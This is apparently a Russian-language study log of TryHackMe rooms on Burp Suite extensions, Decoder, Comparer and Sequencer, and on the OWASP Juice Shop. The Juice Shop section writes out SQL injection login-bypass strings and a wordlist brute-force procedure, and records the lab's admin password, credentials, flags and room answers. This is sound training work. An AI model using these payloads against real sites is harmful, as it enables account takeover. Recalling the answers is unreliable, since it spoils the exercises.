Чтобы ознакомиться с BApp Store и установить расширение для Java, давайте установим расширение Request Timer , написанное Ником Тейлором. Расширение Request Timer позволяет регистрировать время, необходимое для получения ответа на каждый запрос. Эта функция особенно полезна для выявления и использования уязвимостей, основанных на времени. Например, если форма авторизации обрабатывает запросы с действительными именами пользователей на секунду дольше, чем запросы с недействительными, мы можем использовать разницу во времени, чтобы определить, какие имена пользователей являются действительными.

Выполните следующие действия, чтобы установить расширение Request Timer из магазина BApp:

Перейдите во вкладку BApp Store в Burp Suite .
Воспользуйтесь функцией поиска, чтобы найти Request Timer . Для этого расширения должен быть только один результат.
Нажмите на найденное расширение, чтобы просмотреть более подробную информацию.
Нажмите кнопку «Установить» , чтобы установить расширение Request Timer.

После успешной установки расширения вы заметите, что в главном меню в верхней части интерфейса Burp Suite появится новая вкладка . Разные расширения могут вести себя по-разному. Некоторые могут добавлять новые пункты в контекстные меню, вызываемые щелчком правой кнопки мыши, в то время как другие создают совершенно новые вкладки в главной строке меню.

Поскольку данная установка является лишь примером использования BApp Store, мы не будем здесь рассматривать, как использовать Request Timer. Однако я настоятельно рекомендую открыть новую вкладку и изучить расширение, чтобы лучше понять его функциональность. Request Timer может быть полезен в различных сценариях, особенно при оценке безопасности веб-приложений и выявлении потенциальных уязвимостей, связанных со временем.

Задание 4. Jython

Примечание: Если вы используете AttackBox, интеграция с Jython уже выполнена, поэтому вы можете пропустить этот шаг.

Для использования модулей Python в Burp Suite необходимо подключить JAR- файл интерпретатора Jython, который представляет собой реализацию Python на Java. Интерпретатор Jython позволяет запускать расширения на основе Python в Burp Suite.

Выполните следующие шаги, чтобы интегрировать Jython в Burp Suite на вашем локальном компьютере:

Скачать JAR-файл Jython : Зайдите на веб-сайт Jython и скачайте автономный JAR- архив. Найдите опцию «Jython Standalone» . Сохраните JAR- файл в папку на вашем диске.
Настройка Jython в Burp Suite : Откройте Burp Suite и перейдите в модуль «Расширения» . Затем перейдите на вкладку « Настройки расширений» .
Среда Python : прокрутите вниз до раздела "Среда Python".
Укажите местоположение JAR-файла Jython : в поле «Местоположение автономного JAR- файла Jython» укажите путь к загруженному JAR- файлу Jython.

После выполнения этих шагов Jython будет интегрирован с Burp Suite , что позволит вам использовать модули Python в этом инструменте. Эта интеграция значительно увеличивает количество доступных расширений и расширяет ваши возможности при выполнении различных задач по тестированию безопасности и оценке веб-приложений.

Примечание: Процесс добавления Jython в Burp Suite одинаков для всех операционных систем, поскольку Java — это многоплатформенная технология.

Задание 5. The Burp Suite API

В модуле расширений Burp Suite вы получаете доступ к широкому спектру API- интерфейсов, позволяющих создавать и интегрировать ваши модули с Burp Suite . Эти API предоставляют различные функциональные возможности, позволяя расширять возможности Burp Suite в соответствии с вашими конкретными потребностями.

Чтобы просмотреть доступные конечные точки API , перейдите на вкладку «API» в модуле «Расширения». Каждый элемент, указанный на левой панели, представляет собой отдельную конечную точку API , доступную из расширений.

API расширений предоставляют разработчикам значительные возможности и гибкость при создании пользовательских расширений. Вы можете использовать эти API для беспрепятственного взаимодействия с существующим функционалом Burp Suite и адаптировать свои расширения для выполнения конкретных задач.

Burp Suite поддерживает написание расширений на нескольких языках, например:

Java (нативно): Вы можете напрямую использовать Java для написания расширений для Burp Suite , используя преимущества мощных доступных API.
Python (через Jython): Если вы предпочитаете Python в качестве языка программирования, вы можете использовать Jython, который представляет собой реализацию Python на Java, для создания расширений Burp Suite .
Ruby (через JRuby): Разработчики, знакомые с Ruby, могут использовать JRuby, реализацию Ruby на Java, для создания расширений Burp Suite .

Важно отметить, что разработка расширений для Burp Suite может быть сложной задачей, выходящей за рамки данного модуля. Однако, если вас интересует дальнейшее изучение этой области и создание пользовательских расширений, PortSwigger предоставляет исчерпывающий справочник, который является отличным ресурсом для разработки расширений Burp Suite .

Чтобы узнать больше о разработке расширений для Burp Suite и получить доступ к подробной справочной информации, вы можете посетить официальную документацию PortSwigger . Этот ресурс предоставит информацию и рекомендации, необходимые для создания мощных и настраиваемых расширений, которые улучшат ваш опыт работы с Burp Suite .

Задание 6. Заключение

Поздравляем! Вы успешно завершили модуль «Расширения Burp Suite» . Пройдя этот модуль, вы получили ценные знания о том, как использовать расширения для расширения функциональности Burp Suite .

Теперь вы хорошо понимаете, как:

Устанавливайте и управляйте расширениями из магазина BApp, чтобы расширить возможности Burp Suite.
Интегрируйте Jython, чтобы использовать модули Python в Burp Suite .
Изучите API, позволяющие разрабатывать собственные модули на Java, Python или Ruby.

Обладая этими навыками, вы сможете в полной мере использовать модуль Burp Suite Extensions при тестировании безопасности веб-приложений и оценке уязвимостей.

Отличная работа над модулем, и отдельная благодарность за вашу целеустремленность и старания! Продолжайте изучать, совершенствовать и оттачивать свои навыки в области кибербезопасности. Успешного хакинга!

День 40.Burp Suite: Other Modules

2026-03-04T08:12:14.426Z

Задание 1. Введение

Ознакомьтесь с некоторыми менее известными модулями Burp Suite.

Добро пожаловать в раздел «Другие модули Burp Suite» !

Помимо широко известных комнат Repeater и Intruder , в Burp Suite есть несколько менее известных модулей. Именно на них мы сосредоточимся в ходе исследования этой комнаты.

В центре внимания будут инструменты Decoder, Comparer, Sequencer и Organizer. Они упрощают работу с закодированным текстом, позволяют сравнивать наборы данных, анализировать случайность в захваченных токенах и помогают сохранять и аннотировать копии HTTP- сообщений, к которым вы, возможно, захотите вернуться позже. Хотя эти задачи кажутся простыми, их выполнение в Burp Suite может существенно сэкономить время, что подчеркивает важность эффективного использования этих модулей.

Итак, без лишних слов, давайте перейдем к первому инструменту — декодеру.

Задание 2. Декодер: Обзор

Модуль Decoder в Burp Suite предоставляет пользователю возможности манипулирования данными. Как следует из названия, он не только декодирует данные, перехваченные во время атаки, но и предоставляет функцию кодирования собственных данных, подготавливая их к передаче целевому объекту. Decoder также позволяет создавать хеш-суммы данных, а также предоставляет функцию Smart Decode, которая пытается рекурсивно декодировать предоставленные данные, пока они не вернутся в исходный текстовый формат (подобно функции "Magic" в Cyberchef ).

Чтобы получить доступ к декодеру, перейдите во вкладку «Декодер» в верхнем меню и просмотрите доступные параметры:

Этот интерфейс предоставляет множество вариантов.

Это поле служит рабочей областью для ввода или вставки данных, требующих кодирования или декодирования. Как и в других модулях Burp Suite , данные можно перемещать в эту область из разных частей платформы с помощью опции « Отправить в декодер», активируемой щелчком правой кнопки мыши.
В верхней части списка справа есть возможность обрабатывать входные данные либо как текстовые, либо как шестнадцатеричные байтовые значения.
По мере продвижения вниз по списку появляются выпадающие меню для кодирования, декодирования или хеширования входных данных.
Функция Smart Decode , расположенная в конце, пытается автоматически декодировать входные данные.

После ввода данных в поле ввода интерфейс дублируется, отображая результат нашей операции. Затем мы можем выбрать применение дальнейших преобразований, используя те же параметры:

Вопрос: Какая функция пытается выполнить автоматическое декодирование входных данных?
Ответ: Smart decode

Задание 3. Декодер: кодирование/декодирование

Кодирование и декодирование с помощью декодера

Теперь давайте подробно рассмотрим параметры ручного кодирования и декодирования. Они идентичны независимо от того, выбрано ли меню декодирования или кодирования:

Plain : Это относится к исходному тексту до применения каких-либо преобразований.
URL : Кодирование URL используется для обеспечения безопасной передачи данных в URL-адресе веб-запроса. Оно включает замену символов их кодов ASCII в шестнадцатеричном формате, перед которыми стоит символ процента (%). Этот метод крайне важен для тестирования любых веб-приложений.Например, кодирование символа косой черты ( / ), код символа ASCII которого равен 47, преобразует его в шестнадцатеричный код в 2F , таким образом, в кодировке URL он становится %2F . Декодер можно использовать для проверки этого, введя косую черту в поле ввода, а затем выбрав Encode as -> URL:
HTML : Кодирование HTML-сущностей заменяет специальные символы амперсандом (&), за которым следует либо шестнадцатеричное число, либо ссылка на экранируемый символ, и заканчивается точкой с запятой (;). Этот метод обеспечивает безопасное отображение специальных символов в HTML и помогает предотвратить такие атаки, как XSS. Опция HTML в декодере позволяет закодировать любой символ в его экранированный HTML-формат или декодировать захваченные HTML-сущности. Например, чтобы декодировать ранее обсуждавшуюся кавычку, введите закодированную версию и выберите Decode as -> HTML:
Base64 : Base64 — широко используемый метод кодирования, преобразующий любые данные в формат, совместимый с ASCII. Принцип его работы на данном этапе не имеет решающего значения; однако заинтересованные лица могут ознакомиться с базовой математической основой здесь .
ASCII Hex : Эта опция преобразует данные между ASCII и шестнадцатеричным представлением. Например, слово "ASCII" можно преобразовать в шестнадцатеричное число "4153434949". Каждый символ преобразуется из своего числового представления ASCII в шестнадцатеричное.
Шестнадцатеричная, восьмеричная и двоичная системы счисления : эти методы кодирования применяются исключительно к числовым данным, преобразуя их между десятичной, шестнадцатеричной, восьмеричной (основание восемь) и двоичной системами счисления.
Gzip : Gzip сжимает данные, уменьшая размер файлов и страниц перед передачей в браузер. Более быстрая загрузка крайне желательна для разработчиков, стремящихся улучшить свои SEO-показатели и избежать неудобств для пользователей. Декодер облегчает ручное кодирование и декодирование данных gzip, хотя они часто не являются допустимыми ASCII/Unicode. Например:

Эти методы можно комбинировать. Например, фразу ("Burp Suite Decoder") можно преобразовать в шестнадцатеричный код ASCII, а затем в восьмеричный:

В совокупности эти методы предоставляют нам существенный контроль над данными, которые мы кодируем или декодируем.

Каждый метод кодирования/декодирования обозначен определенным цветом, что позволяет быстро определить применяемое преобразование.

шестнадцатеричный формат

Хотя ввод данных в формате ASCII удобен, иногда требуется побайтовое редактирование входных данных. Именно здесь на помощь приходит функция «Шестнадцатеричный просмотр», которую можно выбрать над параметрами декодирования:

Эта функция позволяет просматривать и изменять данные в шестнадцатеричном байтовом формате, что является важным инструментом при работе с бинарными файлами или другими данными, не являющимися ASCII-символами.

Smart Decode

Наконец, у нас есть опция «Умное декодирование» . Эта функция пытается автоматически декодировать закодированный текст. Например, текст Burp Suite автоматически распознается как HTML-код и соответственно декодируется:

Хотя эта функция и не идеальна, она может стать быстрым решением для расшифровки неизвестных фрагментов данных.

Вопрос:

Кодировка фразы в Base64: Let's Start Simple.

Какова версия этого текста в кодировке base64?
Ответ: TGV0J3MgU3RhcnQgU2ltcGxl

Вопрос: Расшифруйте эти данные по URL: %4e%65%78%74%3a%20%44%65%63%6f%64%69%6e%67.

Какой текст возвращается в открытом виде?
Ответ: Next: Decoding

Вопрос: Используйте функцию Smart decode для декодирования этих данных: %34%37.

Что представляет собой расшифрованный текст?
Ответ: 47

Вопрос: Закодируйте эту фразу: Encoding Challenge.

Начните с кодирования base64. Возьмите результат этого кодирования и преобразуйте его в шестнадцатеричный код ASCII. Наконец, закодируйте шестнадцатеричную строку в восьмеричный код .

Какая строка будет последней?

Ответ: 24034214a720270024142d541357471232250253552c1162d1206c

Задание 4. Декодер: Хэширование

HashВ дополнение к функциям кодирования/декодирования, Decoder также предоставляет возможность генерировать хеш-суммы для наших данных.

Теория

Хэширование — это односторонний процесс, преобразующий данные в уникальную сигнатуру. Чтобы функция считалась алгоритмом хэширования, её результат должен быть необратимым. Эффективный алгоритм хэширования гарантирует, что каждый входной параметр данных будет генерировать совершенно уникальный хэш. Например, использование алгоритма MD5 для получения хэш-суммы для текста "MD5sum" даёт результат 4ae1a02de5bd02a5515f583f4fca5e8c. Использование того же алгоритма для "MD5SUM" даёт совершенно другой хэш, несмотря на близкое сходство входных данных: 13b436b09172400c9eb2f69fbd20adad. Поэтому хэши обычно используются для проверки целостности файлов и документов, поскольку даже незначительное изменение файла существенно меняет хэш-сумму.

Примечание: Алгоритм MD5 устарел и не должен использоваться в современных приложениях.

Кроме того, хеши используются для безопасного хранения паролей, поскольку односторонний процесс хеширования делает пароли относительно защищенными, даже если база данных будет скомпрометирована. Когда пользователь создает пароль, приложение хеширует его и сохраняет. Во время входа в систему приложение хеширует введенный пароль и сравнивает его с сохраненным хешем; если они совпадают, пароль верен. Используя этот метод, приложению никогда не нужно хранить исходный (открытый) пароль.

Хэширование в декодере

Декодер позволяет создавать хеш-суммы для данных непосредственно в Burp Suite; он работает аналогично параметрам кодирования/декодирования, которые мы обсуждали ранее. В частности, мы щелкаем по выпадающему меню «Хеш» и выбираем алгоритм из списка:

Примечание: Этот список значительно длиннее, чем список алгоритмов кодирования/декодирования — стоит пролистать его, чтобы увидеть множество доступных алгоритмов хеширования.

Продолжая наш предыдущий пример, введем "MD5sum" в поле ввода, а затем прокрутим список вниз, пока не найдем " MD5 ". Применение этой команды автоматически переведет нас в шестнадцатеричный режим отображения:

Результатом работы хеш-алгоритма является не чистый текст в формате ASCII/Unicode. Поэтому принято преобразовывать результат работы алгоритма в шестнадцатеричную строку; это и есть та самая форма «хеша», с которой вы, возможно, знакомы.

Завершим это, применив к хеш-сумме кодировку "ASCII Hex", чтобы получить аккуратную шестнадцатеричную строку из нашего первоначального примера.

Вот полный процесс:

Вопрос: Используя программу Decoder, определите хеш-сумму SHA-256 для фразы: Let's get Hashing!?

Для ответа на этот вопрос преобразуйте это в шестнадцатеричную ASCII-строку.
Ответ:6b72350e719a8ef5af560830164b13596cb582757437e21d1879502072238abe

Вопрос: Сгенерируйте хеш-сумму MD4 для фразы: Insecure Algorithms.

Перед отправкой закодируйте это в формате base64 (а не в ASCII Hex).
Ответ:TcV4QGZZN7y7lwYFRMMoeA==

Вопрос:

Рассмотрим пример в контексте:

Сначала скачайте файл, прикрепленный к этому заданию.

Примечание: Этот файл также можно загрузить с развернутой виртуальной машины wget http://10.114.155.32:9999/AlteredKeys.zip — это может быть полезно, если вы используете AttackBox.

Теперь ознакомьтесь с приведенным ниже описанием задачи:

«Какой-то шутник подделал мой SSH-ключ! В каталоге четыре ключа, и я понятия не имею, какой из них настоящий. MD5-хеш моего ключа 3166226048d6ad776370dc105d40d9f8 — не могли бы вы его найти?»

Какое правильное название ключа?

Ответ: key3

Задание 5. Сравнительный анализ: Обзор

Как следует из названия, Comparer позволяет сравнивать два фрагмента данных либо по ASCII-словам, либо по байтам.

Давайте сначала рассмотрим интерфейс:

Интерфейс можно разделить на три основных раздела:

Слева мы видим элементы, которые нужно сравнить. Когда мы загружаем данные в Comparer, они отображаются в виде строк в этих таблицах. Мы выбираем два набора данных для сравнения.
В правом верхнем углу расположены параметры для вставки данных из буфера обмена (Вставить), загрузки данных из файла (Загрузить), удаления текущей строки (Удалить) и очистки всех наборов данных (Очистить).
Наконец, в правом нижнем углу мы можем выбрать сравнение наборов данных по словам или по байтам. Неважно, какой из этих вариантов вы выберете изначально, поскольку это можно изменить позже. Это кнопки, которые мы нажимаем, когда готовы сравнить выбранные данные.

Как и в большинстве модулей Burp Suite , мы также можем загружать данные в Comparer из других модулей, щелкнув правой кнопкой мыши и выбрав «Отправить в Comparer» .

После того, как мы добавим как минимум два набора данных для сравнения и нажмем либо «Слова» , либо «Байты» , во всплывающем окне отобразится результат сравнения:

Это окно также состоит из трех отдельных разделов:

Сравниваемые данные занимают большую часть окна; их можно просмотреть как в текстовом, так и в шестнадцатеричном формате. Исходный формат зависит от того, выбрали ли мы сравнение по словам или по байтам в предыдущем окне, но это можно изменить с помощью кнопок над полями сравнения.
В левом нижнем углу находится ключ сравнения, показывающий, какие цвета обозначают измененные, удаленные и добавленные данные в двух наборах данных.
Флажок «Синхронизировать представления» находится в правом нижнем углу окна. При выборе этого флажка гарантируется синхронизация форматов обоих наборов данных. Другими словами, если вы измените один из них на шестнадцатеричный формат, другой автоматически синхронизируется.

В заголовке окна отображается общее количество найденных различий.

Задание 6. Компаратор: Пример

Теперь мы знаем, что делает Comparer, но в чём его польза?

Существует множество ситуаций, когда возможность быстро сравнить два (потенциально очень больших) массива данных может оказаться полезной.

Например, при проведении атаки методом перебора паролей или подбора учетных данных с помощью Intruder, вы можете сравнить два ответа разной длины, чтобы определить, в чем заключаются различия и указывают ли эти различия на успешный вход в систему.

Практический пример

Перейти кhttp://10.114.155.32/support/loginПопробуйте войти в систему с неверным именем пользователя и паролем — перехватите запрос в Burp Proxy .
Отправьте запрос в Repeater с помощью Ctrl + R(или аналогичного инструмента для Mac) или щелкнув правой кнопкой мыши по запросу в модуле Proxy и выбрав «Отправить в Repeater» .
Отправьте запрос, затем щелкните правой кнопкой мыши по ответу и выберите «Отправить в Comparer» .
На вкладке «Ретранслятор» измените учетные данные на следующие: Отправьте запрос еще раз, затем передайте новый ответ в Comparer.

Имя пользователя:support_admin
Пароль:w58ySK4W

Задание 7. Секвенсор: Обзор

Sequencer позволяет нам оценивать энтропию , или случайность, «токенов». Токены — это строки, используемые для идентификации чего-либо, и в идеале они должны генерироваться криптографически безопасным способом. Эти токены могут быть сессионными cookie-файлами или токенами защиты от межсайтовой подделки запросов ( CSRF ) , используемыми для защиты при отправке форм. Если эти токены не генерируются безопасным способом, то теоретически мы можем предсказывать будущие значения токенов. Последствия могут быть существенными, например, если рассматриваемый токен используется для сброса пароля.

Начнём с рассмотрения интерфейса секвенсора:

В Sequencer есть два основных способа проведения анализа токенов:

Захват в реальном времени : это более распространенный метод, и он является подвкладкой по умолчанию для Sequencer. Захват в реальном времени позволяет передать в Sequencer запрос на генерацию токена для анализа. Например, мы можем захотеть передать Sequencer POST-запрос к конечной точке авторизации, зная, что сервер ответит cookie-файлом. После передачи запроса мы можем дать указание Sequencer начать захват в реальном времени. Затем он автоматически выполнит тот же запрос тысячи раз, сохраняя сгенерированные образцы токенов для анализа. После сбора достаточного количества образцов мы останавливаем Sequencer и позволяем ему анализировать захваченные токены.
Ручная загрузка : Это позволяет загрузить список предварительно сгенерированных образцов токенов непосредственно в Sequencer для анализа. Использование ручной загрузки избавляет от необходимости отправлять тысячи запросов к целевому объекту, что может быть избыточным и ресурсоемким процессом. Однако для этого требуется большой список предварительно сгенерированных токенов.

В этой комнате мы сосредоточимся на записи видео в режиме реального времени.

Вопрос: Что позволяет нам оценивать Sequencer?
Ответ: Entropy

Задание 8. Секвенсор: Захват в реальном времени

Отлично, давайте перейдем к процессу использования функции захвата данных в реальном времени Sequencer для анализа энтропии токена защиты от перебора паролей, используемого в форме входа в административную панель.

Сначала перехватите запрос http://10.114.155.32/admin/login/в прокси-сервере . Щелкните правой кнопкой мыши по запросу и выберите «Отправить в секвенсор» .

В разделе «Расположение токена в ответе» можно выбрать между Cookie , полем формы и пользовательским расположением . Поскольку в данном случае мы тестируем loginToken, выберите переключатель «Поле формы» и выберите loginToken из выпадающего меню:

В данной ситуации мы можем смело оставить все остальные параметры по умолчанию. Поэтому нажмите кнопку « Начать захват в реальном времени» .

Откроется новое окно, указывающее на то, что в данный момент идёт захват токенов, и отображающее количество захваченных токенов. Подождите, пока не будет захвачено достаточное количество токенов (примерно 10 000 должно быть достаточно); чем больше токенов мы получим, тем точнее будет наш анализ.

После того, как будет собрано около 10 000 токенов, нажмите «Пауза» , а затем выберите кнопку «Анализировать сейчас» :

Важно отметить, что мы могли бы также остановить захват данных. Однако, выбрав паузу, мы сохраняем возможность возобновить захват данных позже, если в отчете окажется недостаточно выборок для точного расчета энтропии токена .

Если бы нам требовались периодические обновления результатов анализа, мы могли бы также установить флажок «Автоматический анализ». Эта опция указывает Burp выполнять анализ энтропии после каждых 2000 запросов, обеспечивая частые обновления, точность которых будет возрастать по мере загрузки большего количества образцов в Sequencer.

На данном этапе также стоит отметить, что мы можем скопировать или сохранить захваченные токены для дальнейшего анализа в будущем.

После нажатия кнопки «Анализировать сейчас » Burp проанализирует энтропию токена и сгенерирует отчет.

Вопрос: Каково общее качество случайности, по оценке?
Ответ: excellent

Задание 9. Секвенатор: Анализ

Теперь, когда у нас есть отчет по анализу энтропии нашего токена, пришло время его проанализировать!

Сгенерированный отчет об анализе энтропии разделен на четыре основных раздела. Первый из них — это сводка результатов. В сводке содержится следующая информация:

Общий результат : Это дает общую оценку безопасности механизма генерации токенов. В данном случае уровень энтропии указывает на то, что токены, вероятно, генерируются безопасно.
Эффективная энтропия : Этот показатель измеряет степень случайности токенов. Эффективная энтропия в 117 бит является относительно высокой, что указывает на достаточную случайность токенов и, следовательно, на их защиту от атак методом предсказания или перебора.
Надежность : Уровень значимости 1% означает, что существует 99% уверенности в точности результатов. Этот уровень уверенности достаточно высок, что гарантирует точность оценки эффективной энтропии .
Образец : Здесь представлена подробная информация об образцах токенов, проанализированных в процессе тестирования энтропии , включая количество токенов и их характеристики.

Хотя сводный отчет часто содержит достаточно информации для оценки безопасности процесса генерации токенов, важно помнить, что в некоторых случаях может потребоваться дополнительное расследование. Анализ на уровне символов и битов может дать более детальное представление о случайности токенов, особенно когда сводные результаты вызывают потенциальные опасения.

Хотя отчет об энтропии может служить надежным индикатором безопасности механизма генерации токенов, необходимы более убедительные доказательства. На безопасность токенов могут влиять и другие факторы, а природа теории вероятности и статистики подразумевает наличие определенной степени неопределенности. Тем не менее, эффективная энтропия в 117 бит с уровнем значимости 1% свидетельствует о надежном и безопасном процессе генерации токенов.

Задание 10. Организатор: Обзор

Модуль «Организатор» в Burp Suite предназначен для хранения и аннотирования копий HTTP- запросов, к которым вы, возможно, захотите вернуться позже. Этот инструмент может быть особенно полезен для организации рабочего процесса тестирования на проникновение. Вот некоторые из его ключевых функций:

Вы можете сохранять запросы, которые хотите изучить позже, сохранять запросы, которые вы уже определили как интересные, или сохранять запросы, которые хотите добавить в отчет позже.
Вы можете отправлять HTTP- запросы в Burp Organizer из других модулей Burp, таких как Proxy или Repeater . Для этого щелкните правой кнопкой мыши по запросу и выберите «Отправить в Organizer» или используйте стандартную горячую клавишу Ctrl + O. Каждый HTTP- запрос, отправленный в Organizer, представляет собой копию исходного запроса, сохраненную в момент отправки запроса в Organizer, доступную только для чтения.
Запросы хранятся в таблице, которая содержит такие столбцы, как порядковый номер запроса, время отправки запроса, статус рабочего процесса, инструмент Burp, с которого был отправлен запрос, метод HTTP , имя хоста сервера, путь к файлу в URL, строка запроса в URL, количество параметров в запросе, код состояния HTTP ответа, длина ответа в байтах и любые сделанные вами заметки.

Чтобы просмотреть запрос и ответ:

Щелкните по любому элементу Органайзера.
И запрос, и ответ доступны только для чтения. Вы можете выполнить поиск внутри запроса или ответа, выделить запрос, а затем воспользоваться строкой поиска под запросом.

Вопрос: Сохраненные запросы доступны только для чтения? (да/нет)
Ответ: yea

Задание 11. Заключение

Поздравляем с завершением работы над модулем "Другие модули Burp Suite" !

Вкратце, Decoder позволяет кодировать и декодировать данные, упрощая чтение и понимание передаваемой информации. Comparer позволяет выявлять различия между двумя наборами данных, что может иметь решающее значение для обнаружения уязвимостей или аномалий. Sequencer помогает проводить анализ энтропии токенов, предоставляя информацию о случайности их генерации и, следовательно, об уровне их безопасности. Organizer позволяет хранить и аннотировать копии HTTP- запросов, к которым вы, возможно, захотите вернуться позже.

Базовое понимание этих инструментов расширяет ваши навыки в области тестирования веб-приложений на проникновение.

В следующем и заключительном зале этого модуля вы познакомитесь с инструментом Burp Suite Extensions .

День 39. OWASP Juice Shop

2026-03-01T11:10:58.040Z

В этой комнате используется уязвимое веб-приложение Juice Shop, чтобы научиться выявлять и использовать распространенные уязвимости веб-приложений.

1. Открыто для бизнеса!

В этой комнате мы рассмотрим 10 самых распространенных уязвимостей в веб-приложениях по версии OWASP . Они встречаются во всех типах веб-приложений. Но сегодня мы поговорим о собственном изобретении OWASP — Juice Shop!

Перед прохождением этой комнаты рекомендуется пройти бесплатные комнаты Burpsuite « Burpsuite Basics » и « Burpsuite Repeater» !

Juice Shop — это большое приложение, поэтому мы не будем рассматривать все темы из топ-10.

Однако мы рассмотрим следующие темы, с которыми рекомендуем вам ознакомиться по мере прохождения этого раздела.

<------------------------------------------------->

Инъекция

Неработающая аутентификация

Раскрытие конфиденциальных данных

Неработающий контроль доступа

Межсайтовая скриптовая атака (XSS)

<------------------------------------------------->

ПОЖАЛУЙСТА, ОБРАТИ ВНИМАНИЕ!

Для выполнения [Задания 3] и последующих заданий потребуется флажок, который отобразится по завершении задания.

Поиск неисправностей

Загрузка веб-приложения занимает от 2 до 5 минут , поэтому, пожалуйста, наберитесь терпения!

Временно отключите Burp в настройках прокси для текущего браузера. Обновите страницу, и флажок отобразится.

(Это не проблема самого приложения, а проблема Burp, из-за которой флаг не отображается. )

Если при выполнении XSS- атак проблема не решается, очистите файлы cookie и данные сайтов, так как это иногда может быть причиной.

Если вы уверены, что выполнили задание, но оно всё ещё не работает, перейдите к [Заданию 8] , это позволит вам проверить его выполнение.

Благодарим OWASP и Бьорна Кимминича за предоставленные материалы.

2. Давайте отправимся в приключение!

Прежде чем перейти к собственно взлому, стоит осмотреться. В Burp отключите режим перехвата и просмотрите сайт. Это позволит Burp регистрировать различные запросы с сервера, которые могут оказаться полезными в дальнейшем.

Запускаем бурп и кидаем проксирование

Это называется обходом приложения, что также является формой разведки !

Вопрос №1: Какой адрес электронной почты у администратора?

В отзывах указан адрес электронной почты каждого пользователя. А при нажатии на продукт Apple Juice отображается адрес электронной почты администратора!

Вопрос №2: Какой параметр используется для поиска?

При нажатии на значок лупы в правом верхнем углу приложения откроется строка поиска.

Затем мы можем ввести какой-либо текст, и нажатие клавиши Enter выполнит поиск только что введенного текста.

Теперь обратите внимание на URL-адрес, который обновится, отобразив только что введенный нами текст.

Теперь после /#/search? и буквы q мы видим параметр поиска.

3. Введите сок

В этой задаче основное внимание будет уделено уязвимостям внедрения кода. Уязвимости внедрения кода представляют собой серьезную опасность для компании, поскольку могут привести к простоям и/или потере данных. Выявление точек внедрения в веб-приложении обычно довольно просто, поскольку большинство из них возвращают ошибку. Существует множество типов атак внедрения кода, некоторые из них:

SQL -инъекция

SQL- инъекция — это когда злоумышленник вводит вредоносный или некорректный запрос для получения или изменения данных из базы данных. А в некоторых случаях — для входа в учетные записи.

Внедрение команд

Внедрение команд — это когда веб-приложения берут входные или управляемые пользователем данные и выполняют их как системные команды. Злоумышленник может изменить эти данные для выполнения собственных системных команд. Это можно наблюдать в приложениях, которые выполняют неправильно настроенные тесты ping.

Тут я попробовал вызвать ошибку

и что то стригерил

You successfully solved a challenge: Error Handling (Provoke an error that is neither very gracefully nor consistently handled.)
9c297196ecf8890bc1e900fcf3aebae8c9f9880a

Внедрение email-адреса

Внедрение электронных писем — это уязвимость безопасности, позволяющая злоумышленникам отправлять электронные письма без предварительного разрешения почтового сервера. Это происходит, когда злоумышленник добавляет дополнительные данные в поля, которые сервер интерпретирует неправильно.

Но в нашем случае мы будем использовать SQL- инъекцию .

Для получения дополнительной информации: Инъекция

Вопрос №1: Войдите в учетную запись администратора!

После перехода на страницу входа введите данные в поля электронной почты и пароля.

Перед отправкой убедитесь, что режим перехвата включен .

Это позволит нам увидеть данные, отправляемые на сервер!

Теперь мы заменим " a " рядом с адресом электронной почты на: ' или 1=1-- и перешлем его на сервер.

Опять стригирил что то

You successfully solved a challenge: Login Admin (Log in with the administrator's user account.)
Ответ: 690fa3247a99d651e0b26f947baf0b79b4f404a9

Почему это работает?

Символ ' закроет скобки в SQL-запросе.
Оператор ' ИЛИ ' в SQL-запросе вернет true, если хотя бы одна его часть истинна. Поскольку 1=1 всегда истинно , весь запрос истинен. Таким образом, он сообщит серверу, что адрес электронной почты действителен, и выполнит вход в систему под идентификатором пользователя 0 , который является учетной записью администратора.
Символ «--» используется в SQL для комментирования данных; любые ограничения на вход в систему больше не будут работать, поскольку они интерпретируются как комментарий. Это похоже на комментарии # и // в Python и JavaScript соответственно.

Вопрос №2: Войдите в учетную запись Bender!

Аналогично тому, что мы делали в вопросе №1 , теперь войдем в учетную запись Бендера! Снова перехватим запрос на вход, но на этот раз укажем в качестве адреса электронной почты: bender@juice-sh.op'-- .

Теперь перешлите это на сервер!

Но почему бы нам не поставить 1=1 ?

Итак, поскольку адрес электронной почты действителен (что вернет true ), нам не нужно принудительно устанавливать значение true . Таким образом, мы можем использовать '--' для обхода системы авторизации. Обратите внимание, что 1=1 можно использовать, когда адрес электронной почты или имя пользователя неизвестны или недействительны.

You successfully solved a challenge: Login Bender (Log in with Bender's user account.)
Ответ: 5ff5052e879e6fef64124e64c82c84ebc809c6c4

4. Кто взломал мой замок?!

В этой задаче мы рассмотрим использование уязвимостей аутентификации. Говоря об уязвимостях в аутентификации, мы подразумеваем механизмы, подверженные манипуляциям. Именно эти механизмы, перечисленные ниже, мы и будем использовать.

Слабые пароли в учетных записях с высокими привилегиями.

Страницы восстановления пароля

Дополнительная информация: Неработающая аутентификация

Вопрос №1: Подберите пароль от учетной записи администратора методом перебора!

Мы использовали SQL-инъекцию для входа в учетную запись администратора, но пароль нам по-прежнему неизвестен. Давайте попробуем атаку методом перебора! Мы снова перехватим запрос на вход, но вместо отправки его через прокси, мы отправим его в Intruder.

Перейдите в раздел «Позиции», затем выберите кнопку «Очистить §» . В поле пароля поместите два символа § внутри кавычек. Уточним: § § — это не два отдельных поля ввода, а реализация кавычек в Burp, например, "" . Запрос должен выглядеть как на изображении ниже.

Тут просят подобрать паль админа, почту мы уже знаем. (но лучше перебирать не в бурпе - java очень медленный язык и с большим массивом данных он будет долго и тяжко справляться)

В качестве полезной нагрузки мы будем использовать файл best1050.txt из пакета seclists (который можно установить с помощью команды: apt-get install seclists ).

Список можно загрузить по адресу: /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt

После загрузки файла в Burp начните атаку. Вам потребуется отфильтровать запросы по статусу.

В случае неудачной попытки запроса будет отправлена ошибка 401 Unauthorized.

В случае успешного запроса будет возвращен код 200 OK .

После завершения войдите в учетную запись, используя пароль.

пароль: admin123

You successfully solved a challenge: Password Strength (Log in with the administrator's user credentials without previously changing them or applying SQL Injection.)
Ответ: ff4aebffe31b0ffdea9bdd0207a16a3c01ac6c56

Вопрос №2: Сбросить пароль Джима!

3c3e2d6ef99b733b947e92f8e2a9ed08bf57ea63

5. А! Не смотри!

Веб-приложение должно безопасно и надежно хранить и передавать конфиденциальные данные. Однако в некоторых случаях разработчик может не обеспечить надлежащую защиту своих конфиденциальных данных, что делает их уязвимыми.

